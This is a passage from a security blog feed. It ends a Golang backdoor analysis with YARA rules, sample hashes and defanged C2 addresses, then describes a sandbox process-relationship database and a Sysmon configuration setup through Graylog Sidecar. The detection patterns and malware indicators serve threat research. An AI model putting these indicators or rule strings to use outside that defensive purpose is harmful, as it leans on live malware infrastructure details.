src="https://blogger.googleusercontent.com/img/a/AVvXsEi38UN9r00fTukaF1pjS-RuRDbAlD-IOf-0cBn2dH2Mez85uBM7AuQYIxhoDu4cfMR1dnprpP4gOAXpXNhjX4lkgbyRrJjGk3NM8v1EoH1jRxrf0jX0h8B6sTR0t9NHpevvnASsN6ZswKZsJ6LGKAVT4WXZ9o90MNMfYT4PK3zR28gq59BIddX07Gmw=w400-h300" width="400" /></a></div><br /><p></p><p>I did some string searches in Hybrid-Analysis as well to look for more files. (Thanks Hybrid-Analysis for a researcher account!) I finally ended up with this yara rule (i'll learn to write better rules one day):</p><div><div>rule gsh_backdoor</div><div>{</div><div> strings:</div><div> $a = "startInteractive"</div><div> $b = "main.winService"</div><div> $c = "main.(*winService).Start"</div><div> condition:</div><div> ($a and $b and $c) and filesize < 6MB and filesize > 2MB</div><div>and uint16(0) == 0x5A4D</div><div>}</div></div><div><br /></div><div>Searching that on Hybrid-Analysis results in the following hashes:</div><div><div>57150938be45c4d9c742ab24c693acc14cc071d23b088a1facc2a7512af89414</div><div>b63ea16d5187c1fa52a8a20c3fd7b407033bcd4142addb1ce91923d6b2f19555</div><div>57a45d3010d74cbd089cacf23bc0f68eaa3fb8dc5479dbe8ed8e19004badfdb6</div><div>9d42c2b6a10866842cbb6ab455ee2c3108e79fecbffb72eaf13f05215a826765</div><div>95c6d0d4e619334b3d8adb5340198c420f78f937f3dc944bc12a2be7f73fb952</div><div>18077efa0c23e9370eb95ca6c5ece82bcf61e63505a87aea8cb6a14d15500a8c</div><div>55320dcb7e9e96d2723176c22483a81d47887c4c6ddf063dbf72b3bea5b279e3</div></div><br />You can also run strings on the file and extract C2 information by doing egrep:<br />strings -f * | egrep '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?):(\d{0,5})'<div><br /></div><div><div>18077efa0c23e9370eb95ca6c5ece82bcf61e63505a87aea8cb6a14d15500a8c.bin.sample: 142.93.213[.]221:21</div><div>55320dcb7e9e96d2723176c22483a81d47887c4c6ddf063dbf72b3bea5b279e3.bin.sample: 107.181.246[.]146:443</div><div>57a45d3010d74cbd089cacf23bc0f68eaa3fb8dc5479dbe8ed8e19004badfdb6.bin.sample: 198.199.104[.]97:443</div><div>95c6d0d4e619334b3d8adb5340198c420f78f937f3dc944bc12a2be7f73fb952.bin.sample: 64.227.88[.]98:443</div><div>9d42c2b6a10866842cbb6ab455ee2c3108e79fecbffb72eaf13f05215a826765.bin.sample: 107.181.246[.]146:443</div><div>b63ea16d5187c1fa52a8a20c3fd7b407033bcd4142addb1ce91923d6b2f19555.bin.sample: 45.76.236[.]136:443</div><div>winnta.bin: 195.149.87[.]87:443</div></div><div><br /></div><div>One more thing I noticed while researching this is mention of "geodezine" backdoor. Some of the samples connect to the same C2 server as the golang backdoor connects to. I haven't looked too much into it but here's a rule:</div><div><br /></div><div><div>rule geo_backdoor</div><div>{</div><div> strings:</div><div> $a = "geodezine"</div><div> $b = "cmd.exe"</div><div> $c = "URLDownloadToFilDeleteUrlCacheEn"</div><div> condition:</div><div> ($a and $b and $c) and filesize < 100KB and uint16(0) == 0x5A4D</div><div>}</div></div><div><br /></div><div>And here are the hashes that show up on Hybrid-Analysis:</div><div><div>98647c242e5df8122929f4bbdc21495ef28038c64186b4cc8ec8d6e34b838d6a</div><div>51141d45e6257b0f4b15e98ceef00c18869e7958cddd1454385671c14c51492e</div></div><div><br /></div><div><br /></div><div><b>Summary of where this Golang malware shows up and timeline:</b></div><div><b>December 2017</b></div><div>The Shadows of Ghosts
Inside the response of a unique Carbanak intrusion</div><div>Filename: ctlmon.exe</div><div>Malware name: GOTROJ</div><div>C2: 107.181.246[.]146</div><div>Hashes:</div><div>450605b6761ff8dd025978f44724b11e0c5eadcc</div><div>08f527bef45cb001150ef12ad9ab91d1822bb9c7</div><div>7b27771de1a2540008758e9894bfe168f26bffa0</div><div>Attack involved exploitation of CVE-2017-5638</div><div><br /></div><div><a href="https://www.netwitness.com/wp-content/uploads/2021/12/the-shadows-of-ghosts-carbanak-report.pdf">https://www.netwitness.com/wp-content/uploads/2021/12/the-shadows-of-ghosts-carbanak-report.pdf</a></div><div><br /></div><div><b>May 2021</b></div><div>Mercenary APT Groups Targeting the Financial Services Industry</div><div>Filename: winnta / main</div><div>Malware name: GOTROJ-related / gsh</div><div>C2: 45.76.236[.]136, 198.199.104[.]97</div><div>"cyber mercenary attack targeting a major US-based financial services organization"</div><div><br /></div><div><a href="https://www.sentinelone.com/wp-content/uploads/2021/05/Watchtower_2021_May_White.pdf">https://www.sentinelone.com/wp-content/uploads/2021/05/Watchtower_2021_May_White.pdf</a></div><div><br /></div><div><b>August 2021</b></div><div>PROPHET SPIDER Exploits Oracle WebLogic to Facilitate Ransomware Activity</div><div>Filename: winnta</div><div>Malware name: GOTROJ</div><div>Hashes:</div><div>2b03806939d1171f063ba8d14c3b10622edb5732e4f78dc4fe3eac98b56e5d46</div><div>55320dcb7e9e96d2723176c22483a81d47887c4c6ddf063dbf72b3bea5b279e3</div><div>57150938be45c4d9c742ab24c693acc14cc071d23b088a1facc2a7512af89414</div><div>9d42c2b6a10866842cbb6ab455ee2c3108e79fecbffb72eaf13f05215a826765</div><div>exploitation of CVE-2020-14882 and CVE-2020-14750</div><div><br /></div><div><a href="https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/">https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/</a></div><div><br /></div><div><b>March 2022</b></div><div>Forged in Fire: A Survey of MobileIron Log4Shell Exploitation</div><div>Malware name: DARKDOOR</div><div>C2: 162.33.178[.]149, 195.149.87[.]87</div><div>Attributed to UNC961 and related to exploitation of Log4j in Horizon and MobileIron</div><div><br /></div><div><a href="https://www.mandiant.com/resources/blog/mobileiron-log4shell-exploitation">https://www.mandiant.com/resources/blog/mobileiron-log4shell-exploitation</a></div><div><br /></div><div><b>April 2022</b></div><div>Ragnarlocker Ransomware IOCs</div><div>Filename: ctlmon.exe</div><div>Malware name: GOTROJ</div><div>C2: 45.63.89[.]250</div><div>Related to breach involving Ragnarlocker according to the post</div><div><br /></div><div><a href="https://www.fortify24x7.com/2022/04/ragnarlocker-ransomware-iocs/">https://www.fortify24x7.com/2022/04/ragnarlocker-ransomware-iocs/</a></div><div><br /></div><div><b>September 2022</b></div><div>This is the sample that I started out my research with</div><div>Filename: winnta.exe</div><div>Hash: 020f6b3e045fa6b968226a8f2b2800dc55c65e842607d04d68b47ef4d18b0eee</div><div>C2: 195.149.87[.]87</div><div>I just found the sample. I'm not sure what campaign it's related to or any other details. The C2 matches the Mandiant report though.</div><div><br /></div><div>You should be able to pivot from C2 to sample hash or sample hash to C2 using VirusTotal. Some vendors didn't supply C2s or hashes.</div><div><br /></div><div>As far as I know, I have not seen any of these samples running and successfully connecting to C2 in any of the public sandboxes. I haven't seen results in Shodan or Censys that show the C2 port open even with historical search for the September 2022 sample.</div><div><br /></div><div>There may be more samples on VirusTotal but I'm doing this independently and don't have access to VT.</div><div><br /></div><div>I'm not a CTI person. To me this looks like a golang backdoor used by multiple actors. I just hope this post helps anyone Googling things because this sample has been called different things by different vendors and that's annoying. </div><div><br /></div><div><div>Part 1: <a href="https://www.boredhackerblog.info/2022/10/researching-golang-malware-and-how-i.html">https://www.boredhackerblog.info/2022/10/researching-golang-malware-and-how-i.html</a></div><div>Part 2: <a href="https://www.boredhackerblog.info/2022/10/researching-golang-malware-and-how-i_17.html">https://www.boredhackerblog.info/2022/10/researching-golang-malware-and-how-i_17.html</a></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-21567805087430140892022-10-15T10:42:00.000-07:002022-10-15T10:42:50.911-07:00Looking at process relationships from malware sandbox execution data<p><b>Introduction:</b></p><p>This blog post discusses looking at process relationships, specifically from malware sandbox execution data. One of the essential functions of malware sandbox is to gather and display process execution, for example if winword launches powershell, you'd want to know that.</p><p>One issue that I run into while doing research is that many of the public/free malware sandboxes don't allow me to search based on process relationships. For example, if I have a sample on an endpoint that executed whoami, nslookup, systeminfo, i would like to be able to search sandbox reports to see which malware families or samples do that.</p><p>The other thing I'm interested in as a researcher is trends a long for initial access execution, for specific malware families or in general. One of the twitter accounts I follow is <a href="https://twitter.com/pr0xylife">https://twitter.com/pr0xylife</a> and they post information about how malware such as qakbot is doing command/process execution on a system. </p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjfZBQYazF0codzxbO1f4gAgQtc4vifvkskHuOwtKEekMr3dTcuR_SbTMYjuuY1fl_dFKFtobeQb31BrdTCJX9ntx37laQgc4fMh01FXfeok-fdnaXjdfa-QmBoJ4MXbAq9ntaDhUNMByzdHatcA_WreKPO__0JUy3pQdcWo4AZI7FF0CmdoeZANS5u" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="622" data-original-width="858" height="232" src="https://blogger.googleusercontent.com/img/a/AVvXsEjfZBQYazF0codzxbO1f4gAgQtc4vifvkskHuOwtKEekMr3dTcuR_SbTMYjuuY1fl_dFKFtobeQb31BrdTCJX9ntx37laQgc4fMh01FXfeok-fdnaXjdfa-QmBoJ4MXbAq9ntaDhUNMByzdHatcA_WreKPO__0JUy3pQdcWo4AZI7FF0CmdoeZANS5u" width="320" /></a></div>I find the information interesting and obviously, the threat actors have made changes over time. Maybe the threat actors are using new LOLBINs more than before.<p></p><p>The final thing about process relationship data that can be useful is just looking for new things or rare executions. If you're collecting the data, you can do searches to look for rare executions.</p><p>All this research should be helpful with detection engineering too or with emulation, if you're trying to match a specific threat.</p><p><br /></p><p><b>POC Implementation:</b></p><p>As a proof-of-concept, I decided to implement a searchable database that lets me collect data from malware sandbox report and lets me search for parent-child process relationships. </p><p>I acquired my data from Hybrid-Analysis Public Feed, which gives you JSON file with around 250 recent malware analysis results. I also got data from Zero2Auto CAPE sandbox (<a href="https://zero2auto.com/">https://zero2auto.com/</a> Thanks for letting me use the data!)</p><p><br /></p><p>I initially looked at graph databases but asking graph database questions/doing queries seemed annoying to me so I didn't look into them too much.</p><p><br /></p><p>The second thing I tried was to join data from process execution in Python manually, which was a horrible idea. The code turned out horrible and dataset wasn't fun to work with. (<a href="https://github.com/BoredHackerBlog/sandbox_process_relationships/blob/main/hybrid-analysis_public_feed.py">https://github.com/BoredHackerBlog/sandbox_process_relationships/blob/main/hybrid-analysis_public_feed.py</a>)</p><p><br /></p><p>CAPE and Hybrid-Analysis both record process execution data differently but one thing they have in common is a process list json object. Each process object has process metadata and parent process id and obviously the process id. </p><p>I decided to use duckdb to analyze the data. (Usually I'd use sqlite but wanted to try out duckdb and it worked fine)</p><p>I created a table with:</p><p></p><ul style="text-align: left;"><li>report id - specific execution task/detonation in the sandbox</li><li>process id</li><li>parent process id</li><li>process name</li><li>process path</li><li>process command line</li></ul><p></p><p>Then I loaded the results from CAPE or Hybrid-Analysis to the table. I'm loading the same type of data but parsing their json reports is obviously different.</p><p>Finally, I created a view with join, where I ensure that report id is the same and parent process id and process id's match.</p><p>The resulting view contains:</p><p></p><ul style="text-align: left;"><li>Report ID</li><li>Parent Process ID</li><li>Parent Parent Process ID</li><li>Parent Name</li><li>Parent Path</li><li>Parent Command Line</li><li>Process ID</li><li>Process Name</li><li>Process Path</li><li>Process Command Line</li></ul><p></p><p>Gathering data from the sandbox reports and putting it in the database allows me to ask questions like these:<br /></p><p></p><ul style="text-align: left;"><li><b>what process launched ping?</b><span style="font-family: courier;"> select parent_name, proc_commandline from joined_proc_list where proc_commandline ilike '%ping.exe%';</span></li><li><b>what process launched powershell with command line to add Defender exclusion?</b> <span style="font-family: courier;">select parent_name, proc_commandline from joined_proc_list where proc_commandline ilike '%add-mppreference%';</span></li><li><b>what processes launch wscript? </b><span style="font-family: courier;">select parent_name, count(*) as count from joined_proc_list where proc_commandline ilike '%wscript%' group by parent_name</span></li><li><b>what does cmd.exe launch from the appdata folder?</b> <span style="font-family: courier;">select parent_name, proc_name from joined_proc_list where parent_name ilike '%cmd.exe%' AND proc_path ilike '%appdata%';</span></li></ul><p></p><p><br /></p><p>The results look kinda like this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgsxUd0gsn2PK6EWnCv4OlDWkOMdWlIE1ZAnpQ2aSdDzYPY0-ai8eqLngdGiGTiVl8pARLW20ltNYw3UAdvLrEWTAeCkw4iwnYvpgrn5PWurzx4K6G3MPQ_rMIjVpaSkgF8lLKTTtGSkEMu_rIjoPbX-ZsCLUDu0UrE_v0Bxp7Ntd1RZDo6vzBdygoW" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="302" data-original-width="2722" height="72" src="https://blogger.googleusercontent.com/img/a/AVvXsEgsxUd0gsn2PK6EWnCv4OlDWkOMdWlIE1ZAnpQ2aSdDzYPY0-ai8eqLngdGiGTiVl8pARLW20ltNYw3UAdvLrEWTAeCkw4iwnYvpgrn5PWurzx4K6G3MPQ_rMIjVpaSkgF8lLKTTtGSkEMu_rIjoPbX-ZsCLUDu0UrE_v0Bxp7Ntd1RZDo6vzBdygoW=w640-h72" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj3xcSn9Hqa-KZLKj6l1BIYJ8E2_MnedEpZnQRNigwqYOG74kLpgiippTYO224OZ14UfR-ToLiDlAXaftpZ7UBj5OxAAV61w3G64o-zWAYkdiCRJNNhGtv2Su44muF0BHbG4UlREwxQNHswURc_7SefKM8MNPZu_6XNo8rWbHj_avFVefzH8TT1is6j" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="520" data-original-width="3236" height="102" src="https://blogger.googleusercontent.com/img/a/AVvXsEj3xcSn9Hqa-KZLKj6l1BIYJ8E2_MnedEpZnQRNigwqYOG74kLpgiippTYO224OZ14UfR-ToLiDlAXaftpZ7UBj5OxAAV61w3G64o-zWAYkdiCRJNNhGtv2Su44muF0BHbG4UlREwxQNHswURc_7SefKM8MNPZu_6XNo8rWbHj_avFVefzH8TT1is6j=w640-h102" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiAzPiwRVoevJJuXOvX_x6ClSkT8wyVVMfK0PxhFP109uuF0vaqbVHr179cla6v02ABCN8erRWUndVbkhiR92I7Ea2uHG72dDMckt9CEYWnloMxEwlri80_pDmsVF4am6qvHHyPgbZejszR17zGTlMHCLeXX7gTzUSA3s17UR228OTWtxlV8FdGgdLh" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="598" data-original-width="1158" height="165" src="https://blogger.googleusercontent.com/img/a/AVvXsEiAzPiwRVoevJJuXOvX_x6ClSkT8wyVVMfK0PxhFP109uuF0vaqbVHr179cla6v02ABCN8erRWUndVbkhiR92I7Ea2uHG72dDMckt9CEYWnloMxEwlri80_pDmsVF4am6qvHHyPgbZejszR17zGTlMHCLeXX7gTzUSA3s17UR228OTWtxlV8FdGgdLh" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgKLP19U0pU3mUDv3D_ulrFkNhcmLdeLzh_D3vs18uF91s9RGPpJNLF6RaGeBOwhHXrLwgiNcxe_3klANbZTsrxl2H3BnvmoDMI7uAfN47BamjULuoga8kWagU8RJMxorF7p8Bg_GgDUIXi4dQ7lHWi8Q4zUuKeDhIloTcplt9GL3j7O8RQQDejVq-0" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="340" data-original-width="2494" height="88" src="https://blogger.googleusercontent.com/img/a/AVvXsEgKLP19U0pU3mUDv3D_ulrFkNhcmLdeLzh_D3vs18uF91s9RGPpJNLF6RaGeBOwhHXrLwgiNcxe_3klANbZTsrxl2H3BnvmoDMI7uAfN47BamjULuoga8kWagU8RJMxorF7p8Bg_GgDUIXi4dQ7lHWi8Q4zUuKeDhIloTcplt9GL3j7O8RQQDejVq-0=w640-h88" width="640" /></a></div><br /><br /><p></p><p>If you have large enough dataset, you can extract more info like malware or campaign name and etc and keep track of the trends.</p><p><br /></p><p><b>Other solutions:</b></p><p>If you already are doing malware execution in your sandbox, you can check if you are able to search based on process relationships. </p><p>You could also have a backend database that you can query, for example MongoDB or Elasticsearch, although I personally don't know about join capabilities of those databases.</p><p>Alternatively, if your sandbox supports either pushing data out to splunk or elasticsearch or any other place, you could try to work with that data. You can also maybe intercept that data and send it to a webhook or lambda for additional processing.</p><p>If you have a system that supports pulling data, maybe through an API, that's also a solution. Maybe have a script that pulls reports, parses data, and processes it.</p><p>You can store processed data in whatever database you feel comfortable utilizing. I would personally use Clickhouse or Postgresql if I was doing this. </p><p><br /></p><p><b>Links/Resources:</b></p><p>Code: <a href="https://github.com/BoredHackerBlog/sandbox_process_relationships">https://github.com/BoredHackerBlog/sandbox_process_relationships</a></p><p><a href="https://courses.zero2auto.com/">https://courses.zero2auto.com/</a></p><p><a href="https://www.hybrid-analysis.com/">https://www.hybrid-analysis.com/</a></p><p>Also check out Grapl - <a href="https://github.com/grapl-security/grapl">https://github.com/grapl-security/grapl</a></p>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-48791623156394079922022-08-18T12:48:00.001-07:002022-08-18T12:48:27.447-07:00Remotely managing Sysmon configuration through Graylog Sidecar<h2 style="text-align: left;">Introduction:</h2><p>Sysmon is a tool from Microsoft that can help with collecting better logs (compared to default Windows logs) regarding the system. The logs can be very helpful for detection of malicious behavior. Sysmon get's installed as a service and a driver usually along with whatever configuration file you provided. </p><p>It can be kinda annoying to update sysmon configuration as sysmon doesn't come with a remote management system. If you have group of PC's that need different configuration, it can be a bit annoying to go push that out. </p><p>There are some options for updating sysmon configs. </p><p></p><ul style="text-align: left;"><li>You could setup a scheduled task that runs a script to look for a new config and does update. </li><li>You can also use EDR tools that you may already have in place to run scripts or commands to update sysmon. </li><li>You can utilize one of the Windows remote management features such as remote powershell. </li><li>Ansible would work too. It would let you update sysmon config based on groups as Ansible lets you put machines into groups.</li></ul><div>Some of the issues you may have with update methods above is </div><div><ul style="text-align: left;"><li>problem with managing different group of PC's </li><li>updates not being pushed out as soon as possible </li><li>having to open up ports/services on Windows that you'd rather not.</li></ul></div><p></p><p>I decided to go with Graylog sidecar for managing configuration. Graylog sidecar is usually used to manage configuration for log shippers (Beats for example) but it can be adapted to manage sysmon configuration as well!! Sidecar runs as an agent that will connect to Graylog server to get sysmon config updates. </p><h2 style="text-align: left;">Tools:</h2><p>Graylog & sysmon, obviously.</p><p>You need graylog server installed. You can technically use graylog sidecar without using graylog to store your windows or sysmon logs.</p><p>I'm using an admin account for the POC but use whatever the appropriate account is for your requirements.</p><h2 style="text-align: left;">Setting up sidecar:</h2><div>We'll manually set this up first but you can deploy sidecar agent and sysmon, and install both at the same time by creating a package or an initial installation script.</div><p>First, we'll need to create a sidecar token.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjfYe_Ya-3IvnCXH73bHkA2DR7-tUIHl4-qsoSmUUxVO8yYlGw-S_h7Y98CQ4ppi2tE0ubPdE5AYd_YWP81dYuiCNUgLHQJBtz7LeROhfNWeXI4I2cqg8m1lUPThPH_9noG5psGHZqJ6-vM6m_-zAQIwm6L-__-UUITaKFqtKxla4-3SV2ZLLJ58bhn" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="559" data-original-width="260" height="373" src="https://blogger.googleusercontent.com/img/a/AVvXsEjfYe_Ya-3IvnCXH73bHkA2DR7-tUIHl4-qsoSmUUxVO8yYlGw-S_h7Y98CQ4ppi2tE0ubPdE5AYd_YWP81dYuiCNUgLHQJBtz7LeROhfNWeXI4I2cqg8m1lUPThPH_9noG5psGHZqJ6-vM6m_-zAQIwm6L-__-UUITaKFqtKxla4-3SV2ZLLJ58bhn=w174-h373" width="174" /></a></div><br />Go to the sidecars page, create a new token.<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhMMAPhC0ZmUll9nrncONUJXvCMVbtubZMVzigYdNni3KY62_Uqa-47Qb_Xx87iLfZ5f6RbjKMB4kXcqtF0pM1NOzDfhrNrCVD3JVzmkczcP859OwLq9i5FHgbnP9FQEJPpWMJ8n2ZUsYgAgB3AmTY3uJCpvjHwfsLfSjZJolaGwBEWOJqX-q0EBRLw" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="99" data-original-width="664" height="48" src="https://blogger.googleusercontent.com/img/a/AVvXsEhMMAPhC0ZmUll9nrncONUJXvCMVbtubZMVzigYdNni3KY62_Uqa-47Qb_Xx87iLfZ5f6RbjKMB4kXcqtF0pM1NOzDfhrNrCVD3JVzmkczcP859OwLq9i5FHgbnP9FQEJPpWMJ8n2ZUsYgAgB3AmTY3uJCpvjHwfsLfSjZJolaGwBEWOJqX-q0EBRLw" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiNAICAulzRi7nGFiiu2hjJIxRl52VOIudzHtJRf1FJm__EgVxbYXMP3Du3gznji9EwStAp4E3IF-ObKr1WzLQ7_wL5o5geK1JYCuB4sWoT-fuMcUgs49FSyWQL8BlD8eNN4IeFrIGIJknt1Z5lwLKd5jk4Lh_OIpp5q21q8harpHnWJO4vnMyRWwDy" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="303" data-original-width="573" height="198" src="https://blogger.googleusercontent.com/img/a/AVvXsEiNAICAulzRi7nGFiiu2hjJIxRl52VOIudzHtJRf1FJm__EgVxbYXMP3Du3gznji9EwStAp4E3IF-ObKr1WzLQ7_wL5o5geK1JYCuB4sWoT-fuMcUgs49FSyWQL8BlD8eNN4IeFrIGIJknt1Z5lwLKd5jk4Lh_OIpp5q21q8harpHnWJO4vnMyRWwDy=w375-h198" width="375" /></a></div><br />Next, on Windows host, download and install sidecar agent<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj0ieqc6pYcwe4-MYc_LkL3BiCY4SI5jY5WE3OaZLJHgHbGpRrbuMt8JQvU9accSEjReHVqUQAajKAobxPoFeRfN9QWsyO38YG_agS4Mkehk4WPN-2Zhhx6oqDn11-rx0cBFY07G340JGILvi4d1Y9ORzecNxefe5ESf1rKhIYJAYBuUXQiAunVMbWy" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="412" data-original-width="528" height="282" src="https://blogger.googleusercontent.com/img/a/AVvXsEj0ieqc6pYcwe4-MYc_LkL3BiCY4SI5jY5WE3OaZLJHgHbGpRrbuMt8JQvU9accSEjReHVqUQAajKAobxPoFeRfN9QWsyO38YG_agS4Mkehk4WPN-2Zhhx6oqDn11-rx0cBFY07G340JGILvi4d1Y9ORzecNxefe5ESf1rKhIYJAYBuUXQiAunVMbWy=w362-h282" width="362" /></a></div><br />By default, Sidecar files are located at: <b>C:\Program Files\Graylog\sidecar</b><p></p><p>After installation, run the following commands (as admin) to install graylog as a service and start the service:</p><p>"C:\Program Files\graylog\sidecar\graylog-sidecar.exe" -service install</p><p>"C:\Program Files\graylog\sidecar\graylog-sidecar.exe" -service start</p><p>(you can do all of this automatically if you build a package for your organization)</p><p>The host should show up on Sidecar overview page</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjzXln5bxPuo7MvoNMm_O_LfaEN8AzUt7NLP0oBMFrdSdxBvLOsa201k7Uj_ImtUTpCxvcichZ7PFx3__Q6LjzUhAPO2YDsVcwt5L-lyZstlqzsKbyh1U3OnevwpmF-UvON3zvtQEsBoV4JYSz_HKPUO_IZHy0oSb5M5ujhoyQBaQ7zNIVCS5S5wDKu" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="332" data-original-width="804" height="163" src="https://blogger.googleusercontent.com/img/a/AVvXsEjzXln5bxPuo7MvoNMm_O_LfaEN8AzUt7NLP0oBMFrdSdxBvLOsa201k7Uj_ImtUTpCxvcichZ7PFx3__Q6LjzUhAPO2YDsVcwt5L-lyZstlqzsKbyh1U3OnevwpmF-UvON3zvtQEsBoV4JYSz_HKPUO_IZHy0oSb5M5ujhoyQBaQ7zNIVCS5S5wDKu=w395-h163" width="395" /></a></div><br /><br /><p></p><h2 style="text-align: left;">Setting up sysmon support on Windows host:</h2><p>Now that sidecar connection works fine, we need to setup sysmon. I'm placing sysmon executable at <b>C:\Program Files\Graylog\sidecar\sysmon64.exe (make sure its lower case or at least the case matches the sidecar.yml config file)</b></p><p>Next, we need to edit sidecar.yml file to allow the use of sysmon64.exe (again, you can build a package and include sidecar.yml file that already supports this)</p><p>Here's what I have in the config file:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiYn8lbuAiMVR8OFXBxhlCFjnyh4ZIo2QkRxifpdkVtzhWMeH-0oUb5IE5yz0xuHbHkxsSHbiE90TN7NNsGiKmaczeJ6RjPfZpfZlWAOIIrhM6HugLxZfQsdOOceVGsD5Vyc84g5wxoyefcScNL0dpezeWFJ-3i7dpvglQxWHLJcNrxVHigfIZvB3ul" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="81" data-original-width="517" height="64" src="https://blogger.googleusercontent.com/img/a/AVvXsEiYn8lbuAiMVR8OFXBxhlCFjnyh4ZIo2QkRxifpdkVtzhWMeH-0oUb5IE5yz0xuHbHkxsSHbiE90TN7NNsGiKmaczeJ6RjPfZpfZlWAOIIrhM6HugLxZfQsdOOceVGsD5Vyc84g5wxoyefcScNL0dpezeWFJ-3i7dpvglQxWHLJcNrxVHigfIZvB3ul=w412-h64" width="412" /></a></div><br />Restart the graylog sidecar service to ensure that it starts up again and sidecar.yml config file doesnt have any errors:<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg5DhsP1xOCV5BDIAmDPrZVjFv0JiIKnmz2e96Lre722ja2iEzbgoaELGz28O_BfAcHLjOw9ovUjQYhh2paH_kdYNKh4gq8s6Y1b_EvPS9j-i1r7VBrlgHw_fcpJiYImANdXuL1niRfAQCxsWZkuottx_ZUACWL7srEpesz7_lNIB4rphwM6ltkgW4m" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="150" data-original-width="555" height="117" src="https://blogger.googleusercontent.com/img/a/AVvXsEg5DhsP1xOCV5BDIAmDPrZVjFv0JiIKnmz2e96Lre722ja2iEzbgoaELGz28O_BfAcHLjOw9ovUjQYhh2paH_kdYNKh4gq8s6Y1b_EvPS9j-i1r7VBrlgHw_fcpJiYImANdXuL1niRfAQCxsWZkuottx_ZUACWL7srEpesz7_lNIB4rphwM6ltkgW4m=w435-h117" width="435" /></a></div><br />Next, we'll need to install sysmon w/ initial configuration (do this during initial graylog sidecar agent installation)<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjfYicVdMutHZugscSALyMbMfaARKxq6wNKBsk9Bh797nTTvkU-mCH7yjdxfViOEYD0q-drceFttcpMqQxjyL39VDOs6U_6ON1ZFmH0ShVBn0LOm8e57J8-jJJ70u4JST-M7vDeYM70uAcXhAnp_ex5Yu3B_c4MzPruLTxHRV5c7Pwrs82c3AkZVMFa" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="311" data-original-width="734" height="177" src="https://blogger.googleusercontent.com/img/a/AVvXsEjfYicVdMutHZugscSALyMbMfaARKxq6wNKBsk9Bh797nTTvkU-mCH7yjdxfViOEYD0q-drceFttcpMqQxjyL39VDOs6U_6ON1ZFmH0ShVBn0LOm8e57J8-jJJ70u4JST-M7vDeYM70uAcXhAnp_ex5Yu3B_c4MzPruLTxHRV5c7Pwrs82c3AkZVMFa=w416-h177" width="416" /></a></div><br />Now we can setup sysmon configuration in sidecar to do updates.<p></p><h2 style="text-align: left;">Setting up sysmon sidecar configuration in Graylog:</h2><p>Go to collection configuration page in Graylog and click Create Log Collector button.</p><p></p><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgBzss-pHrsJpJiBiJJC6CSABeS2b6Xm49SMKRKPFSTjxEOrKTdLrG3uS6oQs71Qip52n_kNmG7oMNOSS02YyYjOYmCrdW3JoTZHt8hu8b0jYG6Y1mchZorur8Fh_eAWkYMzXSBD4ZkmCBpyv4G97PlHUb2LwpVzjzidM-u-b3opOIxoCYXNM4vxNbm" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="600" data-original-width="746" height="287" src="https://blogger.googleusercontent.com/img/a/AVvXsEgBzss-pHrsJpJiBiJJC6CSABeS2b6Xm49SMKRKPFSTjxEOrKTdLrG3uS6oQs71Qip52n_kNmG7oMNOSS02YyYjOYmCrdW3JoTZHt8hu8b0jYG6Y1mchZorur8Fh_eAWkYMzXSBD4ZkmCBpyv4G97PlHUb2LwpVzjzidM-u-b3opOIxoCYXNM4vxNbm=w356-h287" width="356" /></a></div><br />Create something that looks like this:<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a 